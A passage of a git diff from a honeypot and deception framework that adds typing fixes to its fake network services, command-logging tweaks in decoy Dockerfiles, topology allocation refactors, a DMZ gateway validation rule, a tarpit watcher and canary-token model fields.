src=self._peer[0], username=username, principal=username, severity=SEVERITY_WARNING, **encode_secret(password)) diff --git a/decnet/templates/smtp/syslog_bridge.py b/decnet/templates/smtp/syslog_bridge.py index 7bd1e33f..44cf514a 100644 --- a/decnet/templates/smtp/syslog_bridge.py +++ b/decnet/templates/smtp/syslog_bridge.py @@ -13,6 +13,7 @@ Facility: local0 (16). SD element ID uses PEN 55555. 
""" import base64 +import binascii import re from datetime import datetime, timezone from typing import Any, Optional @@ -144,7 +145,7 @@ def classify_authorization(header_value: Optional[str]) -> Optional[dict[str, An if scheme == "basic": try: decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace") - except (ValueError, base64.binascii.Error): + except (ValueError, binascii.Error): return None if ":" not in decoded: return None diff --git a/decnet/templates/snmp/server.py b/decnet/templates/snmp/server.py index d388bbce..a98ba342 100644 --- a/decnet/templates/snmp/server.py +++ b/decnet/templates/snmp/server.py @@ -9,6 +9,7 @@ Logs all requests as JSON. import asyncio import os import struct +from typing import cast from syslog_bridge import ( encode_secret, forward_syslog, @@ -225,11 +226,13 @@ def _build_response(version: int, community: str, request_id: int, oids: list) - class SNMPProtocol(asyncio.DatagramProtocol): + _transport: asyncio.DatagramTransport | None = None + def __init__(self): self._transport = None - def connection_made(self, transport): - self._transport = transport + def connection_made(self, transport: asyncio.BaseTransport) -> None: + self._transport = cast(asyncio.DatagramTransport, transport) def datagram_received(self, data, addr): try: @@ -244,7 +247,8 @@ class SNMPProtocol(asyncio.DatagramProtocol): principal=None, secret_kind="snmp_community", **encode_secret(community)) response = _build_response(version, community, request_id, oids) - self._transport.sendto(response, addr) + if self._transport is not None: + self._transport.sendto(response, addr) except Exception as e: _log("parse_error", severity=4, src=addr[0], error=str(e), data=data[:64].hex()) diff --git a/decnet/templates/snmp/syslog_bridge.py b/decnet/templates/snmp/syslog_bridge.py index 7bd1e33f..44cf514a 100644 --- a/decnet/templates/snmp/syslog_bridge.py +++ b/decnet/templates/snmp/syslog_bridge.py @@ -13,6 +13,7 @@ Facility: local0 (16). 
SD element ID uses PEN 55555. """ import base64 +import binascii import re from datetime import datetime, timezone from typing import Any, Optional @@ -144,7 +145,7 @@ def classify_authorization(header_value: Optional[str]) -> Optional[dict[str, An if scheme == "basic": try: decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace") - except (ValueError, base64.binascii.Error): + except (ValueError, binascii.Error): return None if ":" not in decoded: return None diff --git a/decnet/templates/ssh/Dockerfile b/decnet/templates/ssh/Dockerfile index 364f3bcc..33515a87 100644 --- a/decnet/templates/ssh/Dockerfile +++ b/decnet/templates/ssh/Dockerfile @@ -109,7 +109,7 @@ RUN echo 'alias ll="ls -alF"' >> /root/.bashrc && \ echo 'alias l="ls -CF"' >> /root/.bashrc && \ echo 'export HISTSIZE=1000' >> /root/.bashrc && \ echo 'export HISTFILESIZE=2000' >> /root/.bashrc && \ - echo 'PROMPT_COMMAND='"'"'logger -p user.info -t bash "CMD uid=$UID user=$USER src=${SSH_CLIENT%% *} pwd=$PWD cmd=$(history 1 | sed "s/^ *[0-9]* *//")";'"'" >> /root/.bashrc + echo 'PROMPT_COMMAND='"'"'logger --rfc5424 --msgid command -p user.info -t bash "CMD uid=$UID user=$USER src=${SSH_CLIENT%% *} pwd=$PWD cmd=$(history 1 | sed "s/^ *[0-9]* *//")";'"'" >> /root/.bashrc # Fake project files to look lived-in RUN mkdir -p /root/projects /root/backups /var/www/html && \ diff --git a/decnet/templates/ssh/syslog_bridge.py b/decnet/templates/ssh/syslog_bridge.py index 7bd1e33f..44cf514a 100644 --- a/decnet/templates/ssh/syslog_bridge.py +++ b/decnet/templates/ssh/syslog_bridge.py @@ -13,6 +13,7 @@ Facility: local0 (16). SD element ID uses PEN 55555. 
""" import base64 +import binascii import re from datetime import datetime, timezone from typing import Any, Optional @@ -144,7 +145,7 @@ def classify_authorization(header_value: Optional[str]) -> Optional[dict[str, An if scheme == "basic": try: decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace") - except (ValueError, base64.binascii.Error): + except (ValueError, binascii.Error): return None if ":" not in decoded: return None diff --git a/decnet/templates/syslog_bridge.py b/decnet/templates/syslog_bridge.py index 7bd1e33f..44cf514a 100644 --- a/decnet/templates/syslog_bridge.py +++ b/decnet/templates/syslog_bridge.py @@ -13,6 +13,7 @@ Facility: local0 (16). SD element ID uses PEN 55555. """ import base64 +import binascii import re from datetime import datetime, timezone from typing import Any, Optional @@ -144,7 +145,7 @@ def classify_authorization(header_value: Optional[str]) -> Optional[dict[str, An if scheme == "basic": try: decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace") - except (ValueError, base64.binascii.Error): + except (ValueError, binascii.Error): return None if ":" not in decoded: return None diff --git a/decnet/templates/telnet/Dockerfile b/decnet/templates/telnet/Dockerfile index 43f421c6..70650aca 100644 --- a/decnet/templates/telnet/Dockerfile +++ b/decnet/templates/telnet/Dockerfile @@ -83,7 +83,7 @@ RUN mkdir -p /root/scripts /root/backups && \ printf 'alias ll="ls -alF"\nalias la="ls -A"\nexport HISTSIZE=1000\n' >> /root/.bashrc # Log bash commands via syslog -RUN echo 'PROMPT_COMMAND='"'"'logger -p user.info -t bash "CMD uid=$UID pwd=$PWD cmd=$(history 1 | sed "s/^ *[0-9]* *//")";'"'" >> /root/.bashrc +RUN echo 'PROMPT_COMMAND='"'"'logger --rfc5424 --msgid command -p user.info -t bash "CMD uid=$UID pwd=$PWD cmd=$(history 1 | sed "s/^ *[0-9]* *//")";'"'" >> /root/.bashrc COPY entrypoint.sh /entrypoint.sh RUN chmod +x /entrypoint.sh diff --git 
a/decnet/templates/telnet/syslog_bridge.py b/decnet/templates/telnet/syslog_bridge.py index 7bd1e33f..44cf514a 100644 --- a/decnet/templates/telnet/syslog_bridge.py +++ b/decnet/templates/telnet/syslog_bridge.py @@ -13,6 +13,7 @@ Facility: local0 (16). SD element ID uses PEN 55555. """ import base64 +import binascii import re from datetime import datetime, timezone from typing import Any, Optional @@ -144,7 +145,7 @@ def classify_authorization(header_value: Optional[str]) -> Optional[dict[str, An if scheme == "basic": try: decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace") - except (ValueError, base64.binascii.Error): + except (ValueError, binascii.Error): return None if ":" not in decoded: return None diff --git a/decnet/templates/tftp/server.py b/decnet/templates/tftp/server.py index 1faf0bdb..3f9a283b 100644 --- a/decnet/templates/tftp/server.py +++ b/decnet/templates/tftp/server.py @@ -8,6 +8,7 @@ then responds with an error packet. Logs all requests as JSON. 
import asyncio import os import struct +from typing import cast from syslog_bridge import syslog_line, write_syslog_file, forward_syslog NODE_NAME = os.environ.get("NODE_NAME", "tftpserver") @@ -33,11 +34,13 @@ def _log(event_type: str, severity: int = 6, **kwargs) -> None: class TFTPProtocol(asyncio.DatagramProtocol): + _transport: asyncio.DatagramTransport | None = None + def __init__(self): self._transport = None - def connection_made(self, transport): - self._transport = transport + def connection_made(self, transport: asyncio.BaseTransport) -> None: + self._transport = cast(asyncio.DatagramTransport, transport) def datagram_received(self, data: bytes, addr): if len(data) < 4: @@ -56,7 +59,8 @@ class TFTPProtocol(asyncio.DatagramProtocol): filename=filename, mode=mode, ) - self._transport.sendto(_error_pkt(2, "Access violation"), addr) + if self._transport is not None: + self._transport.sendto(_error_pkt(2, "Access violation"), addr) else: _log("unknown_opcode", src=addr[0], opcode=opcode, data=data[:32].hex()) diff --git a/decnet/templates/tftp/syslog_bridge.py b/decnet/templates/tftp/syslog_bridge.py index 7bd1e33f..44cf514a 100644 --- a/decnet/templates/tftp/syslog_bridge.py +++ b/decnet/templates/tftp/syslog_bridge.py @@ -13,6 +13,7 @@ Facility: local0 (16). SD element ID uses PEN 55555. """ import base64 +import binascii import re from datetime import datetime, timezone from typing import Any, Optional @@ -144,7 +145,7 @@ def classify_authorization(header_value: Optional[str]) -> Optional[dict[str, An if scheme == "basic": try: decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace") - except (ValueError, base64.binascii.Error): + except (ValueError, binascii.Error): return None if ":" not in decoded: return None diff --git a/decnet/templates/vnc/server.py b/decnet/templates/vnc/server.py index 32cbdc57..4015d20c 100644 --- a/decnet/templates/vnc/server.py +++ b/decnet/templates/vnc/server.py @@ -9,6 +9,7 @@ failed". 
Logs the raw response for offline cracking. import asyncio import os import base64 as _base64 +from typing import cast from syslog_bridge import syslog_line, write_syslog_file, forward_syslog NODE_NAME = os.environ.get("NODE_NAME", "desktop") @@ -26,24 +27,29 @@ def _log(event_type: str, severity: int = 6, **kwargs) -> None: class VNCProtocol(asyncio.Protocol): + _transport: asyncio.Transport | None = None + _peer: tuple[str, int] | None = None + def __init__(self): self._transport = None self._peer = None self._buf = b"" self._state = "version" - def connection_made(self, transport): - self._transport = transport - self._peer = transport.get_extra_info("peername", ("?", 0)) + def connection_made(self, transport: asyncio.BaseTransport) -> None: + self._transport = cast(asyncio.Transport, transport) + self._peer = cast(tuple[str, int], self._transport.get_extra_info("peername", ("?", 0))) _log("connect", src=self._peer[0], src_port=self._peer[1]) # Send RFB version - transport.write(b"RFB 003.008\n") + self._transport.write(b"RFB 003.008\n") def data_received(self, data): self._buf += data self._process() - def _process(self): + def _process(self) -> None: + assert self._transport is not None + assert self._peer is not None if self._state == "version": if b"\n" not in self._buf: return diff --git a/decnet/templates/vnc/syslog_bridge.py b/decnet/templates/vnc/syslog_bridge.py index 7bd1e33f..44cf514a 100644 --- a/decnet/templates/vnc/syslog_bridge.py +++ b/decnet/templates/vnc/syslog_bridge.py @@ -13,6 +13,7 @@ Facility: local0 (16). SD element ID uses PEN 55555. 
""" import base64 +import binascii import re from datetime import datetime, timezone from typing import Any, Optional @@ -144,7 +145,7 @@ def classify_authorization(header_value: Optional[str]) -> Optional[dict[str, An if scheme == "basic": try: decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace") - except (ValueError, base64.binascii.Error): + except (ValueError, binascii.Error): return None if ":" not in decoded: return None diff --git a/decnet/topology/allocator.py b/decnet/topology/allocator.py index 7600c730..86ecc8d4 100644 --- a/decnet/topology/allocator.py +++ b/decnet/topology/allocator.py @@ -12,8 +12,9 @@ open one. from __future__ import annotations from ipaddress import IPv4Network -from typing import Any, Iterable +from typing import Iterable +from decnet.topology.repository import TopologyRepository from decnet.topology.status import TopologyStatus @@ -34,6 +35,7 @@ class IPAllocator: self._pool: list[str] = [ str(ip) for ip in self._net.hosts() if str(ip) != self._gateway ] + self._host_set: frozenset[str] = frozenset(str(h) for h in self._net.hosts()) self._taken: set[str] = set() self._cursor = 0 @@ -57,7 +59,7 @@ class IPAllocator: def reserve(self, ip: str) -> None: if ip == self._gateway: raise ValueError(f"{ip} is the gateway of {self._net.with_prefixlen}") - if ip not in {str(h) for h in self._net.hosts()}: + if ip not in self._host_set: raise ValueError(f"{ip} not in {self._net.with_prefixlen}") self._taken.add(ip) @@ -65,7 +67,7 @@ class IPAllocator: self._taken.discard(ip) def is_free(self, ip: str) -> bool: - return ip not in self._taken and ip in {str(h) for h in self._net.hosts()} and ip != self._gateway + return ip not in self._taken and ip in self._host_set and ip != self._gateway class SubnetAllocator: @@ -148,13 +150,12 @@ _SUBNET_CLAIMING_STATES: frozenset[str] = frozenset( ) -async def reserved_subnets(repo: Any) -> set[str]: +async def reserved_subnets(repo: TopologyRepository) -> set[str]: """All LAN 
subnets currently claimed by non-torn-down topologies.""" out: set[str] = set() for status in _SUBNET_CLAIMING_STATES: for topo in await repo.list_topologies(status=status): - for lan in await repo.list_lans_for_topology(topo["id"]): - subnet = lan.get("subnet") - if subnet: - out.add(subnet) + for lan in await repo.list_lans_for_topology(topo.id): + if lan.subnet: + out.add(lan.subnet) return out diff --git a/decnet/topology/compose.py b/decnet/topology/compose.py index 0cb41357..7de8a86a 100644 --- a/decnet/topology/compose.py +++ b/decnet/topology/compose.py @@ -26,6 +26,10 @@ from decnet.services.registry import get_service _DEFAULT_BASE_IMAGE = "debian:bookworm-slim" +# 8 chars matches the git short-SHA convention; collision-safe within +# a single deployment's network namespace. +_TOPOLOGY_ID_PREFIX_LEN = 8 + _DOCKER_LOGGING = { "driver": "json-file", "options": {"max-size": "10m", "max-file": "5"}, @@ -34,12 +38,12 @@ _DOCKER_LOGGING = { def _network_name(topology_id: str, lan_name: str) -> str: """Docker network name for a given (topology, LAN) pair.""" - return f"decnet_t_{topology_id[:8]}_{lan_name.lower()}" + return f"decnet_t_{topology_id[:_TOPOLOGY_ID_PREFIX_LEN]}_{lan_name.lower()}" def _container_name(topology_id: str, decky_name: str) -> str: """Container name for a decky base in a topology.""" - return f"decnet_t_{topology_id[:8]}_{decky_name}" + return f"decnet_t_{topology_id[:_TOPOLOGY_ID_PREFIX_LEN]}_{decky_name}" def generate_topology_compose(hydrated: dict[str, Any]) -> dict: diff --git a/decnet/topology/generator.py b/decnet/topology/generator.py index 7933f189..aea513bc 100644 --- a/decnet/topology/generator.py +++ b/decnet/topology/generator.py @@ -23,7 +23,9 @@ from decnet.topology.config import ( _PlannedLAN, ) -# Range of services per randomly assigned decky (matches decnet.fleet). +# Per-decky service count bounds. 
1 minimum keeps every decky functional; +# 3 maximum balances service diversity against subnet IP utilization — the +# full non-singleton service pool (~28 entries) makes higher counts wasteful. _SVC_MIN = 1 _SVC_MAX = 3 @@ -74,7 +76,7 @@ def _pick_services( rng: random.Random, services_explicit: Optional[list[str]], pool: list[str], - used_combos: set[frozenset], + seen_service_pairs: set[frozenset], ) -> list[str]: if services_explicit: return list(services_explicit) @@ -85,12 +87,39 @@ def _pick_services( count = rng.randint(_SVC_MIN, min(_SVC_MAX, len(pool))) # nosec B311 chosen = frozenset(rng.sample(pool, count)) # nosec B311 attempts += 1 - if chosen not in used_combos or attempts > 20: + if chosen not in seen_service_pairs or attempts > 20: break - used_combos.add(chosen) + seen_service_pairs.add(chosen) return list(chosen) +def _take_ip(ip_allocs: dict[str, IPAllocator], lan_name: str) -> str: + return ip_allocs[lan_name].next_free() + + +def _new_decky( + home_lan: str, + *, + counter: list[int], + rng: random.Random, + config: TopologyConfig, + svc_pool: list[str], + seen_service_pairs: set[frozenset], + ip_allocs: dict[str, IPAllocator], + deckies: list[_PlannedDecky], +) -> _PlannedDecky: + counter[0] += 1 + name = f"decky-{counter[0]:03d}" + services = _pick_services(rng, config.services_explicit, svc_pool, seen_service_pairs) + decky = _PlannedDecky( + name=name, + services=services, + ips_by_lan={home_lan: _take_ip(ip_allocs, home_lan)}, + ) + deckies.append(decky) + return decky + + def generate( config: TopologyConfig, *, @@ -108,7 +137,9 @@ def generate( """ rng = random.Random(config.seed) # nosec B311 svc_pool = all_service_names() if config.randomize_services else [] - used_combos: set[frozenset] = set() + # Tracks unique service frozensets assigned so far; prevents every decky + # from getting the same randomly-picked combo on small service pools. 
+ seen_service_pairs: set[frozenset] = set() subnets = SubnetAllocator( config.subnet_base_prefix, reserved=reserved_subnets or set() @@ -121,27 +152,9 @@ def generate( lan.name: IPAllocator(lan.subnet) for lan in lans } - def _take_ip(lan_name: str) -> str: - return ip_allocs[lan_name].next_free() - deckies: list[_PlannedDecky] = [] edges: list[_PlannedEdge] = [] - decky_counter = 0 - - def _new_decky(home_lan: str) -> _PlannedDecky: - nonlocal decky_counter - decky_counter += 1 - name = f"decky-{decky_counter:03d}" - services = _pick_services( - rng, config.services_explicit, svc_pool, used_combos - ) - decky = _PlannedDecky( - name=name, - services=services, - ips_by_lan={home_lan: _take_ip(home_lan)}, - ) - deckies.append(decky) - return decky + decky_counter = [0] # Populate each LAN with its own deckies. for lan in lans: @@ -154,7 +167,16 @@ def generate( if count < 1: count = 1 # every LAN needs ≥1 decky to host the bridge for _ in range(count): - decky = _new_decky(lan.name) + decky = _new_decky( + lan.name, + counter=decky_counter, + rng=rng, + config=config, + svc_pool=svc_pool, + seen_service_pairs=seen_service_pairs, + ip_allocs=ip_allocs, + deckies=deckies, + ) edges.append( _PlannedEdge( decky_name=decky.name, @@ -178,7 +200,7 @@ def generate( continue candidates = deckies_by_lan[lan.name] bridge = rng.choice(candidates) # nosec B311 - bridge.ips_by_lan[lan.parent] = _take_ip(lan.parent) + bridge.ips_by_lan[lan.parent] = _take_ip(ip_allocs, lan.parent) forwards = rng.random() < config.bridge_forward_probability # nosec B311 bridge.forwards_l3 = bridge.forwards_l3 or forwards # Mark both existing edges as bridge edges for this decky, and @@ -214,7 +236,7 @@ def generate( decky = rng.choice(deckies_by_lan[lan.name]) # nosec B311 if peer.name in decky.ips_by_lan: continue # already connected, skip - decky.ips_by_lan[peer.name] = _take_ip(peer.name) + decky.ips_by_lan[peer.name] = _take_ip(ip_allocs, peer.name) forwards = rng.random() < 
config.bridge_forward_probability # nosec B311 decky.forwards_l3 = decky.forwards_l3 or forwards for e in edges: diff --git a/decnet/topology/persistence.py b/decnet/topology/persistence.py index 5cf9616c..df5ef9bc 100644 --- a/decnet/topology/persistence.py +++ b/decnet/topology/persistence.py @@ -5,12 +5,13 @@ from ipaddress import IPv4Address, IPv4Network from typing import Any from decnet.topology.allocator import IPAllocator +from decnet.topology.repository import TopologyRepository from decnet.topology.config import GeneratedTopology from decnet.topology.status import TopologyStatus, assert_transition async def persist( - repo: Any, + repo: TopologyRepository, plan: GeneratedTopology, *, target_host_uuid: str | None = None, @@ -90,7 +91,7 @@ async def persist( async def transition_status( - repo: Any, + repo: TopologyRepository, topology_id: str, new_status: str, reason: str | None = None, @@ -103,11 +104,11 @@ async def transition_status( topo = await repo.get_topology(topology_id) if topo is None: raise ValueError(f"topology {topology_id!r} not found") - assert_transition(topo["status"], new_status) + assert_transition(topo.status, new_status) await repo.update_topology_status(topology_id, new_status, reason=reason) -async def hydrate(repo: Any, topology_id: str) -> dict[str, Any] | None: +async def hydrate(repo: TopologyRepository, topology_id: str) -> dict[str, Any] | None: """Load a topology + children into a single dict for callers. 
Shape:: @@ -124,15 +125,21 @@ async def hydrate(repo: Any, topology_id: str) -> dict[str, Any] | None: topo = await repo.get_topology(topology_id) if topo is None: return None - lans = await repo.list_lans_for_topology(topology_id) - deckies = await repo.list_topology_deckies(topology_id) - edges = await repo.list_topology_edges(topology_id) - _backfill_decky_configs(lans, deckies, edges) + lans_dto = await repo.list_lans_for_topology(topology_id) + deckies_dto = await repo.list_topology_deckies(topology_id) + edges_dto = await repo.list_topology_edges(topology_id) + # Convert to dicts for _backfill_decky_configs (mutates decky_config in-place). + # mode="json" is mandatory: datetime fields must arrive as ISO strings for all + # downstream consumers (canonical_hash, deployer, api_get_topology, etc.). + lan_dicts = [m.model_dump(mode="json") for m in lans_dto] + decky_dicts = [m.model_dump(mode="json") for m in deckies_dto] + edge_dicts = [m.model_dump(mode="json") for m in edges_dto] + _backfill_decky_configs(lan_dicts, decky_dicts, edge_dicts) return { - "topology": topo, - "lans": lans, - "deckies": deckies, - "edges": edges, + "topology": topo.model_dump(mode="json"), + "lans": lan_dicts, + "deckies": decky_dicts, + "edges": edge_dicts, } diff --git a/decnet/topology/repository.py b/decnet/topology/repository.py new file mode 100644 index 00000000..6a2c7317 --- /dev/null +++ b/decnet/topology/repository.py @@ -0,0 +1,29 @@ +from __future__ import annotations + +from typing import Any, Optional, Protocol + +from decnet.web.db.models.topology import DeckyRow, EdgeRow, LANRow, TopologySummary + + +class TopologyRepository(Protocol): + """Structural contract for the topology subsystem's repo dependency. + + Declares only the 10 methods the topology package actually calls. + Any object with matching async signatures satisfies this Protocol + without inheritance — including BaseRepository and test stubs. 
+ """ + + async def create_topology(self, data: dict[str, Any]) -> str: ... + async def get_topology(self, topology_id: str) -> Optional[TopologySummary]: ... + async def update_topology_status( + self, topology_id: str, new_status: str, reason: Optional[str] = None + ) -> None: ... + async def list_topologies( + self, status: Optional[str] = None + ) -> list[TopologySummary]: ... + async def add_lan(self, data: dict[str, Any]) -> str: ... + async def list_lans_for_topology(self, topology_id: str) -> list[LANRow]: ... + async def add_topology_decky(self, data: dict[str, Any]) -> str: ... + async def list_topology_deckies(self, topology_id: str) -> list[DeckyRow]: ... + async def add_topology_edge(self, data: dict[str, Any]) -> str: ... + async def list_topology_edges(self, topology_id: str) -> list[EdgeRow]: ... diff --git a/decnet/topology/validate.py b/decnet/topology/validate.py index bc241659..1cce0b8c 100644 --- a/decnet/topology/validate.py +++ b/decnet/topology/validate.py @@ -16,8 +16,11 @@ from ipaddress import IPv4Address, IPv4Network from typing import Any, Callable, Literal from decnet.fleet import all_service_names +from decnet.logging import get_logger from decnet.services.registry import get_service +log = get_logger("topology.validate") + Severity = Literal["error", "warning"] @@ -283,6 +286,72 @@ def check_service_config_shape(h: dict[str, Any]) -> list[ValidationIssue]: return issues +def check_gateway_homed_in_dmz(h: dict[str, Any]) -> list[ValidationIssue]: + """Gateway deckies must live in a DMZ LAN. + + ``forwards_l3=True`` triggers host-port publishing in the compose + generator (see :mod:`decnet.topology.compose`); a gateway sitting + on an internal LAN would publish ports on the host without anyone + on the right side of the perimeter able to reach the service + legitimately. The semantic is "this decky is the front door" — + only meaningful when the LAN is the DMZ. 
+ + Not in ``_RULES``: ``forwards_l3`` encodes two semantics — internal + bridge routing (generator-assigned, legitimately on non-DMZ LANs) and + DMZ gateway publication (operator-assigned, must be DMZ-homed). + Standing validation cannot distinguish them; this check is therefore + path-specific and called only on the explicit operator flip path + (``forwards_l3: False → True`` via ``apply_update_decky``). + """ + if not h.get("deckies"): + return [] + + lans_by_id = {lan["id"]: lan for lan in h["lans"]} + dmz_lan_ids = { + lan["id"] for lan in h["lans"] if lan.get("is_dmz") + } + dmz_lan_names = { + lan["name"] for lan in h["lans"] if lan.get("is_dmz") + } + + # Home-LAN selection mirrors the frontend hydration: prefer the + # non-bridge edge. Falls back to the first edge if no + # is_bridge flag is set (legacy rows). + home_lan_for: dict[str, str] = {} # decky_uuid → lan_id + for e in h["edges"]: + if e.get("is_bridge") is False and e["decky_uuid"] not in home_lan_for: + home_lan_for[e["decky_uuid"]] = e["lan_id"] + for e in h["edges"]: + if e["decky_uuid"] in home_lan_for: + continue + home_lan_for[e["decky_uuid"]] = e["lan_id"] + + issues: list[ValidationIssue] = [] + for d in h["deckies"]: + cfg = d.get("decky_config") or {} + if not cfg.get("forwards_l3"): + continue + home_lan_id = home_lan_for.get(d["uuid"]) + if home_lan_id is None or home_lan_id not in dmz_lan_ids: + home_lan_name = ( + lans_by_id.get(home_lan_id, {}).get("name") + if home_lan_id + else "(no home LAN)" + ) + allowed = ", ".join(sorted(dmz_lan_names)) or "(no DMZ defined)" + issues.append( + ValidationIssue( + "error", + "GATEWAY_NOT_IN_DMZ", + f"gateway decky {d['name']!r} is on LAN " + f"{home_lan_name!r}; gateways must home in a DMZ " + f"LAN ({allowed})", + target={"decky": d["name"], "lan": home_lan_name}, + ) + ) + return issues + + def check_no_host_port_collision(h: dict[str, Any]) -> list[ValidationIssue]: """Flag gateway service ports that are already bound on the host. 
@@ -311,7 +380,8 @@ def check_no_host_port_collision(h: dict[str, Any]) -> list[ValidationIssue]: for c in psutil.net_connections(kind="inet") if c.status == psutil.CONN_LISTEN and c.laddr } - except Exception: + except ImportError: + log.warning("psutil not available; skipping host port collision check") return [] issues: list[ValidationIssue] = [] @@ -342,6 +412,8 @@ _RULES: list[Callable[[dict[str, Any]], list[ValidationIssue]]] = [ check_services_known, check_service_config_shape, ] +# check_gateway_homed_in_dmz is intentionally absent — it is path-specific +# (forwards_l3 overloads two semantics). See its docstring. def validate(hydrated: dict[str, Any]) -> list[ValidationIssue]: diff --git a/decnet/web/api.py b/decnet/web/api.py index d40836b2..7d8dff12 100644 --- a/decnet/web/api.py +++ b/decnet/web/api.py @@ -31,6 +31,7 @@ from decnet.web.dependencies import repo from decnet.collector import log_collector_worker from decnet.web.ingester import log_ingestion_worker from decnet.profiler import attacker_profile_worker +from decnet.tarpit import tarpit_watcher_worker from decnet.web.limiter import limiter from decnet.web.router import api_router from slowapi import _rate_limit_exceeded_handler @@ -43,6 +44,7 @@ collector_task: Optional[asyncio.Task[Any]] = None attacker_task: Optional[asyncio.Task[Any]] = None sniffer_task: Optional[asyncio.Task[Any]] = None heartbeat_task: Optional[asyncio.Task[Any]] = None +tarpit_task: Optional[asyncio.Task[Any]] = None def get_background_tasks() -> dict[str, Optional[asyncio.Task[Any]]]: @@ -52,13 +54,14 @@ def get_background_tasks() -> dict[str, Optional[asyncio.Task[Any]]]: "collector_worker": collector_task, "attacker_worker": attacker_task, "sniffer_worker": sniffer_task, + "tarpit_watcher": tarpit_task, } @asynccontextmanager async def lifespan(app: FastAPI) -> AsyncGenerator[None, None]: global ingestion_task, collector_task, attacker_task, sniffer_task - global heartbeat_task + global heartbeat_task, tarpit_task 
import resource soft, hard = resource.getrlimit(resource.RLIMIT_NOFILE) @@ -162,6 +165,11 @@ async def lifespan(app: FastAPI) -> AsyncGenerator[None, None]: log.warning("Sniffer worker failed to start — API continues without sniffing: %s", exc) else: log.debug("API startup: sniffer not embedded — expecting standalone daemon") + + # Tarpit watcher — always-on, near-zero cost when no rules exist. + if tarpit_task is None or tarpit_task.done(): + tarpit_task = asyncio.create_task(tarpit_watcher_worker(repo)) + log.debug("API startup: tarpit watcher started") else: log.info("Contract Test Mode: skipping background worker startup") @@ -191,7 +199,7 @@ async def lifespan(app: FastAPI) -> AsyncGenerator[None, None]: await get_registry().stop() except Exception as exc: # noqa: BLE001 log.warning("worker registry stop raised: %s", exc) - for task in (ingestion_task, collector_task, attacker_task, sniffer_task, heartbeat_task): + for task in (ingestion_task, collector_task, attacker_task, sniffer_task, heartbeat_task, tarpit_task): if task and not task.done(): task.cancel() try: diff --git a/decnet/web/db/models/__init__.py b/decnet/web/db/models/__init__.py index f3d2d74d..10ea3d18 100644 --- a/decnet/web/db/models/__init__.py +++ b/decnet/web/db/models/__init__.py @@ -63,6 +63,16 @@ from .deploy import ( MutateIntervalRequest, PurgeResponse, ) +from .decky import ( + DeckyFileDeleteRequest, + DeckyFileDropRequest, + DeckyServiceAddRequest, + DeckyServiceConfigRequest, + DeckyServiceConfigResponse, + DeckyServicesResponse, + ServiceConfigFieldDTO, + ServiceSchemaResponse, +) from .fleet import ( LOCAL_HOST_SENTINEL, FleetDecky, @@ -169,6 +179,12 @@ from .workers import ( WorkersResponse, WorkerStatus, ) +from .tarpit import ( + TarpitEnableRequest, + TarpitRule, + TarpitRuleResponse, + TarpitStatusResponse, +) __all__ = [ # _base @@ -222,7 +238,15 @@ __all__ = [ "PurgeResponse", # fleet "LOCAL_HOST_SENTINEL", + "DeckyFileDeleteRequest", + "DeckyFileDropRequest", + 
"DeckyServiceAddRequest", + "DeckyServiceConfigRequest", + "DeckyServiceConfigResponse", + "DeckyServicesResponse", "FleetDecky", + "ServiceConfigFieldDTO", + "ServiceSchemaResponse", # health "ComponentHealth", "HealthResponse", @@ -316,4 +340,9 @@ __all__ = [ "WorkerControlResponse", "WorkersResponse", "WorkerStatus", + # tarpit + "TarpitEnableRequest", + "TarpitRule", + "TarpitRuleResponse", + "TarpitStatusResponse", ] diff --git a/decnet/web/db/models/canary.py b/decnet/web/db/models/canary.py index efc155c0..e58c8ba2 100644 --- a/decnet/web/db/models/canary.py +++ b/decnet/web/db/models/canary.py @@ -100,6 +100,12 @@ class CanaryToken(SQLModel, table=True): uuid: str = Field(default_factory=lambda: str(uuid4()), primary_key=True) kind: str = Field(index=True) # CanaryKind literal at the API layer decky_name: str = Field(index=True) # FleetDecky.name; no FK (composite PK) + # When NULL, the token is on a fleet decky (decky_name resolves to + # ``-ssh``). When set, it points at a MazeNET topology — the + # planter resolves the container via :func:`resolve_topology_container`. + # No FK: topologies are mutable and we don't want a row to vanish on + # cascade; the row is the historical record of placement. + topology_id: Optional[str] = Field(default=None, index=True) blob_uuid: Optional[str] = Field( default=None, foreign_key="canary_blobs.uuid", index=True, ) @@ -126,6 +132,12 @@ class CanaryToken(SQLModel, table=True): last_error: Optional[str] = Field( default=None, sa_column=Column("last_error", Text, nullable=True), ) + # 16-hex HMAC nonce embedded in fingerprint canary JS payloads. NULL for + # all non-fingerprint generators. Derived at mint time from + # HMAC-SHA256(DECNET_CANARY_FINGERPRINT_SECRET, callback_token + mint_uuid) + # truncated to 16 chars; the worker validates incoming ?n= against this + # value to reject slug-only fingerprint spoofs. 
+ fingerprint_nonce: Optional[str] = Field(default=None, max_length=16) class CanaryTrigger(SQLModel, table=True): @@ -188,6 +200,10 @@ class CanaryTokenCreateRequest(BaseModel): router so the 400 carries a clear detail message. """ decky_name: str = PydanticField(..., min_length=1) + # When set, ``decky_name`` is interpreted as a MazeNET topology decky + # name; the server validates membership and resolves the container + # accordingly. Absent ⇒ fleet semantics (today's behavior). + topology_id: Optional[str] = None kind: CanaryKind placement_path: str = PydanticField(..., min_length=1) blob_uuid: Optional[str] = None @@ -202,6 +218,7 @@ class CanaryTokenResponse(BaseModel): uuid: str kind: CanaryKind decky_name: str + topology_id: Optional[str] = None blob_uuid: Optional[str] instrumenter: Optional[str] generator: Optional[str] diff --git a/decnet/web/db/models/decky.py b/decnet/web/db/models/decky.py new file mode 100644 index 00000000..dfbc248c --- /dev/null +++ b/decnet/web/db/models/decky.py @@ -0,0 +1,130 @@ +"""DTOs for cross-cutting decky operations (file drops, etc.). + +These don't bind to a single table — fleet deckies and MazeNET +(topology) deckies share the request shape, with ``topology_id`` +discriminating. Following ``feedback_models_single_source`` we put +the request/response shapes alongside the rest of the API contracts +under ``decnet.web.db.models``. +""" +from __future__ import annotations + +from typing import Any, Optional + +from pydantic import BaseModel, Field as PydanticField, field_validator + + +class DeckyFileDropRequest(BaseModel): + """Drop arbitrary bytes at an absolute path inside a decky container. + + ``content_b64`` is the base64-encoded payload. Binary-safe. + + ``mode`` defaults to ``0o644`` (octal int). ``mtime_offset`` is a + seconds offset from now applied via 